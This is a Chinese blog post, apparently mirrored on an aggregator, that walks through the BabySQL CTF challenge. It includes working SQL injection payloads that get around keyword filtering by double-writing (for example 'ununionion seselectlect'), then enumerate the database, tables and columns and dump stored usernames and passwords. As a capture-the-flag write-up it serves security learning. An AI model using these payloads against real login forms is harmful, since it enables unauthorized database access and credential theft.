当前位置: 首页 > article >正文

[极客大挑战 2019]BabySQL 1

article 2024/11/5 11:28:26

[极客大挑战 2019]BabySQL 1

审题

还是SQL注入和之前的是一个系列的。

知识点

联合注入,双写绕过

解题

  1. 输入万能密码

    image-20240303195246322

发现回显中没有or,猜测是使用正则过滤了or。

image-20240303195314025

  1. 尝试双写绕过

image-20240303195525169

登录成功

image-20240303195548503

  1. 使用联合查询,本题中过滤了from,where,or ,by,union,select。

    image-20240303195737079

看到4没有注入点,2和3都有

image-20240303195814102

image-20240303200208066

image-20240303200221880

  1. 输入

    1'ununionion seselectlect 1,2,database()#

    爆出数据库

    image-20240303200429453

  2. 输入

    1' ununionion selselectect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()#

    得到类名

    image-20240303201245845

  3. 输入

    1' ununionion selselectect 1,2,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql'#

    得到表名

    image-20240303201453469

  4. 输入

    1' ununionion selselectect 1,2,group_concat(id,username,passwoorrd) frfromom b4bsql#

    得到表的内容

image-20240303201713680


http://www.kler.cn/a/380054.html

相关文章:

  • Java之包,抽象类,接口
  • C#如何封装将函数封装为接口dll?
  • 2、liunx网络基础
  • 【Python】数据清洗与特征工程:使用Python的Feature-engine库
  • jmeter脚本-请求体设置变量and请求体太长的处理
  • docker配置与基础操作
  • 开源数据库 - mysql - innodb源码阅读 - master线程(一)
  • 24.11.4 OpenCV 图像滤波 卷积核概念 图像平滑处理 图像边缘处理 图像边缘检测 图像形态学操作 学习笔记
  • OpenAI + asyncio 异步调用
  • MoonBit 双周报 Vol.59:新增编译器常量支持,改进未使用警告,支持跨包函数导入...多个关键技术持续优化中!
  • python NLTK快速入门
  • 计算机网络:网络层 —— 移动 IP 技术
  • 力扣904-水果成篮-两种思路
  • 【Kettle的安装与使用】使用Kettle实现mysql和hive的数据传输(使用Kettle将mysql数据导入hive、将hive数据导入mysql)
  • 思科路由器静态路由配置
  • 讲讲⾼并发的原则?
  • 从 vue 源码看问题 — vue 初始化都做了什么事?
  • CentOS Linux教程(11)--查看文件
  • RK3229 Android9自定义一个按键实现长按短按
  • 鸿蒙next字符串基础:掌握字符串操作与多语言支持
  • 如何选择最适合的消息队列?详解 Kafka、RocketMQ、RabbitMQ 的使用场景
  • Seelen UI 界面介绍与苹果界面类似
  • 易泊车牌识别相机:夜间识别的卓越之选
  • 【大语言模型】ACL2024论文-04 PriveLM-Bench: 语言模型多层次隐私评估基准
  • Pytorch学习--神经网络--搭建小实战(手撕CIFAR 10 model structure)和 Sequential 的使用
  • 网络爬虫的定义